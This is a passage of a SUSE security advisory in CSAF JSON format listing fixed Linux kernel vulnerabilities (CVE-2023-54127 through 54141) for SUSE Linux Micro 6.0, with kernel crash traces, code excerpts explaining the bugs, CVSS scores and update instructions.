"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/jfs: prevent double-free in dbUnmount() after failed jfs_remount()\n\nSyzkaller reported the following issue:\n==================================================================\nBUG: KASAN: double-free in slab_free mm/slub.c:3787 [inline]\nBUG: KASAN: double-free in __kmem_cache_free+0x71/0x110 mm/slub.c:3800\nFree of addr ffff888086408000 by task syz-executor.4/12750\n[...]\nCall Trace:\n \u003cTASK\u003e\n[...]\n kasan_report_invalid_free+0xac/0xd0 mm/kasan/report.c:482\n ____kasan_slab_free+0xfb/0x120\n kasan_slab_free include/linux/kasan.h:177 [inline]\n slab_free_hook mm/slub.c:1781 [inline]\n slab_free_freelist_hook+0x12e/0x1a0 mm/slub.c:1807\n slab_free mm/slub.c:3787 [inline]\n __kmem_cache_free+0x71/0x110 mm/slub.c:3800\n dbUnmount+0xf4/0x110 fs/jfs/jfs_dmap.c:264\n jfs_umount+0x248/0x3b0 fs/jfs/jfs_umount.c:87\n jfs_put_super+0x86/0x190 fs/jfs/super.c:194\n generic_shutdown_super+0x130/0x310 fs/super.c:492\n kill_block_super+0x79/0xd0 fs/super.c:1386\n deactivate_locked_super+0xa7/0xf0 fs/super.c:332\n cleanup_mnt+0x494/0x520 fs/namespace.c:1291\n task_work_run+0x243/0x300 kernel/task_work.c:179\n resume_user_mode_work include/linux/resume_user_mode.h:49 [inline]\n exit_to_user_mode_loop+0x124/0x150 kernel/entry/common.c:171\n exit_to_user_mode_prepare+0xb2/0x140 kernel/entry/common.c:203\n __syscall_exit_to_user_mode_work kernel/entry/common.c:285 [inline]\n syscall_exit_to_user_mode+0x26/0x60 kernel/entry/common.c:296\n do_syscall_64+0x49/0xb0 arch/x86/entry/common.c:86\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n[...]\n \u003c/TASK\u003e\n\nAllocated by task 13352:\n kasan_save_stack mm/kasan/common.c:45 [inline]\n kasan_set_track+0x3d/0x60 mm/kasan/common.c:52\n ____kasan_kmalloc mm/kasan/common.c:371 [inline]\n __kasan_kmalloc+0x97/0xb0 mm/kasan/common.c:380\n kmalloc include/linux/slab.h:580 [inline]\n dbMount+0x54/0x980 fs/jfs/jfs_dmap.c:164\n jfs_mount+0x1dd/0x830 fs/jfs/jfs_mount.c:121\n jfs_fill_super+0x590/0xc50 fs/jfs/super.c:556\n mount_bdev+0x26c/0x3a0 fs/super.c:1359\n legacy_get_tree+0xea/0x180 fs/fs_context.c:610\n vfs_get_tree+0x88/0x270 fs/super.c:1489\n do_new_mount+0x289/0xad0 fs/namespace.c:3145\n do_mount fs/namespace.c:3488 [inline]\n __do_sys_mount fs/namespace.c:3697 [inline]\n __se_sys_mount+0x2d3/0x3c0 fs/namespace.c:3674\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nFreed by task 13352:\n kasan_save_stack mm/kasan/common.c:45 [inline]\n kasan_set_track+0x3d/0x60 mm/kasan/common.c:52\n kasan_save_free_info+0x27/0x40 mm/kasan/generic.c:518\n ____kasan_slab_free+0xd6/0x120 mm/kasan/common.c:236\n kasan_slab_free include/linux/kasan.h:177 [inline]\n slab_free_hook mm/slub.c:1781 [inline]\n slab_free_freelist_hook+0x12e/0x1a0 mm/slub.c:1807\n slab_free mm/slub.c:3787 [inline]\n __kmem_cache_free+0x71/0x110 mm/slub.c:3800\n dbUnmount+0xf4/0x110 fs/jfs/jfs_dmap.c:264\n jfs_mount_rw+0x545/0x740 fs/jfs/jfs_mount.c:247\n jfs_remount+0x3db/0x710 fs/jfs/super.c:454\n reconfigure_super+0x3bc/0x7b0 fs/super.c:935\n vfs_fsconfig_locked fs/fsopen.c:254 [inline]\n __do_sys_fsconfig fs/fsopen.c:439 [inline]\n __se_sys_fsconfig+0xad5/0x1060 fs/fsopen.c:314\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n[...]\n\nJFS_SBI(ipbmap-\u003ei_sb)-\u003ebmap wasn\u0027t set to NULL after kfree() in\ndbUnmount().\n\nSyzkaller uses faultinject to reproduce this KASAN double-free\nwarning. The issue is triggered if either diMount() or dbMount() fail\nin jfs_remount(), since diUnmount() or dbUnmount() already happened in\nsuch a case - they will do double-free on next execution: jfs_umount\nor jfs_remount.\n\nTested on both upstream and jfs-next by syzkaller.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54127",
"url": "https://www.suse.com/security/cve/CVE-2023-54127"
},
{
"category": "external",
"summary": "SUSE Bug 1256119 for CVE-2023-54127",
"url": "https://bugzilla.suse.com/1256119"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54127"
},
{
"cve": "CVE-2023-54133",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54133"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfp: clean mc addresses in application firmware when closing port\n\nWhen moving devices from one namespace to another, mc addresses are\ncleaned in software while not removed from application firmware. Thus\nthe mc addresses are remained and will cause resource leak.\n\nNow use `__dev_mc_unsync` to clean mc addresses when closing port.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54133",
"url": "https://www.suse.com/security/cve/CVE-2023-54133"
},
{
"category": "external",
"summary": "SUSE Bug 1256104 for CVE-2023-54133",
"url": "https://bugzilla.suse.com/1256104"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54133"
},
{
"cve": "CVE-2023-54134",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54134"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nautofs: fix memory leak of waitqueues in autofs_catatonic_mode\n\nSyzkaller reports a memory leak:\n\nBUG: memory leak\nunreferenced object 0xffff88810b279e00 (size 96):\n comm \"syz-executor399\", pid 3631, jiffies 4294964921 (age 23.870s)\n hex dump (first 32 bytes):\n 00 00 00 00 00 00 00 00 08 9e 27 0b 81 88 ff ff ..........\u0027.....\n 08 9e 27 0b 81 88 ff ff 00 00 00 00 00 00 00 00 ..\u0027.............\n backtrace:\n [\u003cffffffff814cfc90\u003e] kmalloc_trace+0x20/0x90 mm/slab_common.c:1046\n [\u003cffffffff81bb75ca\u003e] kmalloc include/linux/slab.h:576 [inline]\n [\u003cffffffff81bb75ca\u003e] autofs_wait+0x3fa/0x9a0 fs/autofs/waitq.c:378\n [\u003cffffffff81bb88a7\u003e] autofs_do_expire_multi+0xa7/0x3e0 fs/autofs/expire.c:593\n [\u003cffffffff81bb8c33\u003e] autofs_expire_multi+0x53/0x80 fs/autofs/expire.c:619\n [\u003cffffffff81bb6972\u003e] autofs_root_ioctl_unlocked+0x322/0x3b0 fs/autofs/root.c:897\n [\u003cffffffff81bb6a95\u003e] autofs_root_ioctl+0x25/0x30 fs/autofs/root.c:910\n [\u003cffffffff81602a9c\u003e] vfs_ioctl fs/ioctl.c:51 [inline]\n [\u003cffffffff81602a9c\u003e] __do_sys_ioctl fs/ioctl.c:870 [inline]\n [\u003cffffffff81602a9c\u003e] __se_sys_ioctl fs/ioctl.c:856 [inline]\n [\u003cffffffff81602a9c\u003e] __x64_sys_ioctl+0xfc/0x140 fs/ioctl.c:856\n [\u003cffffffff84608225\u003e] do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n [\u003cffffffff84608225\u003e] do_syscall_64+0x35/0xb0 arch/x86/entry/common.c:80\n [\u003cffffffff84800087\u003e] entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nautofs_wait_queue structs should be freed if their wait_ctr becomes zero.\nOtherwise they will be lost.\n\nIn this case an AUTOFS_IOC_EXPIRE_MULTI ioctl is done, then a new\nwaitqueue struct is allocated in autofs_wait(), its initial wait_ctr\nequals 2. After that wait_event_killable() is interrupted (it returns\n-ERESTARTSYS), so that \u0027wq-\u003ename.name == NULL\u0027 condition may be not\nsatisfied. Actually, this condition can be satisfied when\nautofs_wait_release() or autofs_catatonic_mode() is called and, what is\nalso important, wait_ctr is decremented in those places. Upon the exit of\nautofs_wait(), wait_ctr is decremented to 1. Then the unmounting process\nbegins: kill_sb calls autofs_catatonic_mode(), which should have freed the\nwaitqueues, but it only decrements its usage counter to zero which is not\na correct behaviour.\n\nedit:imk\nThis description is of course not correct. The umount performed as a result\nof an expire is a umount of a mount that has been automounted, it\u0027s not the\nautofs mount itself. They happen independently, usually after everything\nmounted within the autofs file system has been expired away. If everything\nhasn\u0027t been expired away the automount daemon can still exit leaving mounts\nin place. But expires done in both cases will result in a notification that\ncalls autofs_wait_release() with a result status. The problem case is the\nsummary execution of of the automount daemon. In this case any waiting\nprocesses won\u0027t be woken up until either they are terminated or the mount\nis umounted.\nend edit: imk\n\nSo in catatonic mode we should free waitqueues which counter becomes zero.\n\nedit: imk\nInitially I was concerned that the calling of autofs_wait_release() and\nautofs_catatonic_mode() was not mutually exclusive but that can\u0027t be the\ncase (obviously) because the queue entry (or entries) is removed from the\nlist when either of these two functions are called. Consequently the wait\nentry will be freed by only one of these functions or by the woken process\nin autofs_wait() depending on the order of the calls.\nend edit: imk",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54134",
"url": "https://www.suse.com/security/cve/CVE-2023-54134"
},
{
"category": "external",
"summary": "SUSE Bug 1256106 for CVE-2023-54134",
"url": "https://bugzilla.suse.com/1256106"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54134"
},
{
"cve": "CVE-2023-54135",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54135"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmaple_tree: fix potential out-of-bounds access in mas_wr_end_piv()\n\nCheck the write offset end bounds before using it as the offset into the\npivot array. This avoids a possible out-of-bounds access on the pivot\narray if the write extends to the last slot in the node, in which case the\nnode maximum should be used as the end pivot.\n\nakpm: this doesn\u0027t affect any current callers, but new users of mapletree\nmay encounter this problem if backported into earlier kernels, so let\u0027s\nfix it in -stable kernels in case of this.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54135",
"url": "https://www.suse.com/security/cve/CVE-2023-54135"
},
{
"category": "external",
"summary": "SUSE Bug 1256107 for CVE-2023-54135",
"url": "https://bugzilla.suse.com/1256107"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54135"
},
{
"cve": "CVE-2023-54136",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54136"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nserial: sprd: Fix DMA buffer leak issue\n\nRelease DMA buffer when _probe() returns failure to avoid memory leak.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54136",
"url": "https://www.suse.com/security/cve/CVE-2023-54136"
},
{
"category": "external",
"summary": "SUSE Bug 1256099 for CVE-2023-54136",
"url": "https://bugzilla.suse.com/1256099"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54136"
},
{
"cve": "CVE-2023-54137",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54137"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvfio/type1: fix cap_migration information leak\n\nFix an information leak where an uninitialized hole in struct\nvfio_iommu_type1_info_cap_migration on the stack is exposed to userspace.\n\nThe definition of struct vfio_iommu_type1_info_cap_migration contains a hole as\nshown in this pahole(1) output:\n\n struct vfio_iommu_type1_info_cap_migration {\n struct vfio_info_cap_header header; /* 0 8 */\n __u32 flags; /* 8 4 */\n\n /* XXX 4 bytes hole, try to pack */\n\n __u64 pgsize_bitmap; /* 16 8 */\n __u64 max_dirty_bitmap_size; /* 24 8 */\n\n /* size: 32, cachelines: 1, members: 4 */\n /* sum members: 28, holes: 1, sum holes: 4 */\n /* last cacheline: 32 bytes */\n };\n\nThe cap_mig variable is filled in without initializing the hole:\n\n static int vfio_iommu_migration_build_caps(struct vfio_iommu *iommu,\n struct vfio_info_cap *caps)\n {\n struct vfio_iommu_type1_info_cap_migration cap_mig;\n\n cap_mig.header.id = VFIO_IOMMU_TYPE1_INFO_CAP_MIGRATION;\n cap_mig.header.version = 1;\n\n cap_mig.flags = 0;\n /* support minimum pgsize */\n cap_mig.pgsize_bitmap = (size_t)1 \u003c\u003c __ffs(iommu-\u003epgsize_bitmap);\n cap_mig.max_dirty_bitmap_size = DIRTY_BITMAP_SIZE_MAX;\n\n return vfio_info_add_capability(caps, \u0026cap_mig.header, sizeof(cap_mig));\n }\n\nThe structure is then copied to a temporary location on the heap. At this point\nit\u0027s already too late and ioctl(VFIO_IOMMU_GET_INFO) copies it to userspace\nlater:\n\n int vfio_info_add_capability(struct vfio_info_cap *caps,\n struct vfio_info_cap_header *cap, size_t size)\n {\n struct vfio_info_cap_header *header;\n\n header = vfio_info_cap_add(caps, size, cap-\u003eid, cap-\u003eversion);\n if (IS_ERR(header))\n return PTR_ERR(header);\n\n memcpy(header + 1, cap + 1, size - sizeof(*header));\n\n return 0;\n }\n\nThis issue was found by code inspection.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54137",
"url": "https://www.suse.com/security/cve/CVE-2023-54137"
},
{
"category": "external",
"summary": "SUSE Bug 1256100 for CVE-2023-54137",
"url": "https://bugzilla.suse.com/1256100"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54137"
},
{
"cve": "CVE-2023-54140",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54140"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnilfs2: fix WARNING in mark_buffer_dirty due to discarded buffer reuse\n\nA syzbot stress test using a corrupted disk image reported that\nmark_buffer_dirty() called from __nilfs_mark_inode_dirty() or\nnilfs_palloc_commit_alloc_entry() may output a kernel warning, and can\npanic if the kernel is booted with panic_on_warn.\n\nThis is because nilfs2 keeps buffer pointers in local structures for some\nmetadata and reuses them, but such buffers may be forcibly discarded by\nnilfs_clear_dirty_page() in some critical situations.\n\nThis issue is reported to appear after commit 28a65b49eb53 (\"nilfs2: do\nnot write dirty data after degenerating to read-only\"), but the issue has\npotentially existed before.\n\nFix this issue by checking the uptodate flag when attempting to reuse an\ninternally held buffer, and reloading the metadata instead of reusing the\nbuffer if the flag was lost.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54140",
"url": "https://www.suse.com/security/cve/CVE-2023-54140"
},
{
"category": "external",
"summary": "SUSE Bug 1256093 for CVE-2023-54140",
"url": "https://bugzilla.suse.com/1256093"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "low"
}
],
"title": "CVE-2023-54140"
},
{
"cve": "CVE-2023-54141",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54141"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath11k: Add missing hw_ops-\u003eget_ring_selector() for IPQ5018\n\nDuring sending data after clients connected, hw_ops-\u003eget_ring_selector()\nwill be called. But for IPQ5018, this member isn\u0027t set, and the\nfollowing NULL pointer exception will be occurred:\n\n\t[ 38.840478] 8\u003c--- cut here ---\n\t[ 38.840517] Unable to handle kernel NULL pointer dereference at virtual address 00000000\n\t...\n\t[ 38.923161] PC is at 0x0\n\t[ 38.927930] LR is at ath11k_dp_tx+0x70/0x730 [ath11k]\n\t...\n\t[ 39.063264] Process hostapd (pid: 1034, stack limit = 0x801ceb3d)\n\t[ 39.068994] Stack: (0x856a9a68 to 0x856aa000)\n\t...\n\t[ 39.438467] [\u003c7f323804\u003e] (ath11k_dp_tx [ath11k]) from [\u003c7f314e6c\u003e] (ath11k_mac_op_tx+0x80/0x190 [ath11k])\n\t[ 39.446607] [\u003c7f314e6c\u003e] (ath11k_mac_op_tx [ath11k]) from [\u003c7f17dbe0\u003e] (ieee80211_handle_wake_tx_queue+0x7c/0xc0 [mac80211])\n\t[ 39.456162] [\u003c7f17dbe0\u003e] (ieee80211_handle_wake_tx_queue [mac80211]) from [\u003c7f174450\u003e] (ieee80211_probereq_get+0x584/0x704 [mac80211])\n\t[ 39.467443] [\u003c7f174450\u003e] (ieee80211_probereq_get [mac80211]) from [\u003c7f178c40\u003e] (ieee80211_tx_prepare_skb+0x1f8/0x248 [mac80211])\n\t[ 39.479334] [\u003c7f178c40\u003e] (ieee80211_tx_prepare_skb [mac80211]) from [\u003c7f179e28\u003e] (__ieee80211_subif_start_xmit+0x32c/0x3d4 [mac80211])\n\t[ 39.491053] [\u003c7f179e28\u003e] (__ieee80211_subif_start_xmit [mac80211]) from [\u003c7f17af08\u003e] (ieee80211_tx_control_port+0x19c/0x288 [mac80211])\n\t[ 39.502946] [\u003c7f17af08\u003e] (ieee80211_tx_control_port [mac80211]) from [\u003c7f0fc704\u003e] (nl80211_tx_control_port+0x174/0x1d4 [cfg80211])\n\t[ 39.515017] [\u003c7f0fc704\u003e] (nl80211_tx_control_port [cfg80211]) from [\u003c808ceac4\u003e] (genl_rcv_msg+0x154/0x340)\n\t[ 39.526814] [\u003c808ceac4\u003e] (genl_rcv_msg) from [\u003c808cdb74\u003e] (netlink_rcv_skb+0xb8/0x11c)\n\t[ 39.536446] [\u003c808cdb74\u003e] (netlink_rcv_skb) from [\u003c808ce1d0\u003e] (genl_rcv+0x28/0x34)\n\t[ 39.544344] [\u003c808ce1d0\u003e] (genl_rcv) from [\u003c808cd234\u003e] (netlink_unicast+0x174/0x274)\n\t[ 39.551895] [\u003c808cd234\u003e] (netlink_unicast) from [\u003c808cd510\u003e] (netlink_sendmsg+0x1dc/0x440)\n\t[ 39.559362] [\u003c808cd510\u003e] (netlink_sendmsg) from [\u003c808596e0\u003e] (____sys_sendmsg+0x1a8/0x1fc)\n\t[ 39.567697] [\u003c808596e0\u003e] (____sys_sendmsg) from [\u003c8085b1a8\u003e] (___sys_sendmsg+0xa4/0xdc)\n\t[ 39.575941] [\u003c8085b1a8\u003e] (___sys_sendmsg) from [\u003c8085b310\u003e] (sys_sendmsg+0x44/0x74)\n\t[ 39.583841] [\u003c8085b310\u003e] (sys_sendmsg) from [\u003c80300060\u003e] (ret_fast_syscall+0x0/0x40)\n\t...\n\t[ 39.620734] Code: bad PC value\n\t[ 39.625869] ---[ end trace 8aef983ad3cbc032 ]---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54141",
"url": "https://www.suse.com/security/cve/CVE-2023-54141"
},
{
"category": "external",
